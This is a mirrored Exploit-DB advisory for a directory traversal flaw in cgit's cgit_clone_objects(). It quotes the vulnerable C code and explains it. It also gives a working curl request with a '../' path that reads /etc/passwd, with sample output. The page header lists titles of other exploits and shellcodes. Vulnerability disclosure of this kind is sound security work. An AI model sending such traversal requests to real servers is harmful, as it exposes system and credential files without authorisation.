bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/cgi/webapps/45148.txt
Offensive Security 3aca47020d DB: 2018-08-04 
10 changes to exploits/shellcodes

FTPShell Client 5.24 - Add to Favorites Buffer Overflow
FTPShell Client 5.24 - 'Add to Favorites' Buffer Overflow

FTPShell Client 5.24 - Create NewFolder Local Buffer Overflow
FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow
Wedding Slideshow Studio 1.36 - Buffer Overflow
Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)

Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting
Auditor Website 2.0.1 - Cross-Site Scripting
Basic B2B Script 2.0.0 - Cross-Site Scripting
Entrepreneur Job Portal Script 3.0.1 - Cross-Site Scripting
PHP Template Store Script 3.0.6 - Cross-Site Scripting
Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection
Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection
cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal

Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)
Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (128 Bytes)
2018-08-04 05:01:46 +00:00

25 lines
No EOL
1 KiB
Text
Raw Blame History

There is a directory traversal vulnerability in cgit_clone_objects(), reachable when the configuration flag enable-http-clone is set to 1 (default):
void cgit_clone_objects(void)
{
if (!ctx.qry.path) {
cgit_print_error_page(400, "Bad request", "Bad request");
return;
}
if (!strcmp(ctx.qry.path, "info/packs")) {
print_pack_info();
return;
}
send_file(git_path("objects/%s", ctx.qry.path));
}
send_file() is a function that simply sends the data stored at the given filesystem path out over the network.
git_path() partially rewrites the provided path and e.g. prepends the base path of the repository, but it does not sanitize the provided path to prevent directory traversal.
ctx.qry.path can come from querystring_cb(), which takes unescaped data from the querystring. To trigger this case:
$ curl http://127.0.0.1/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Reference in a new issue View git blame Copy permalink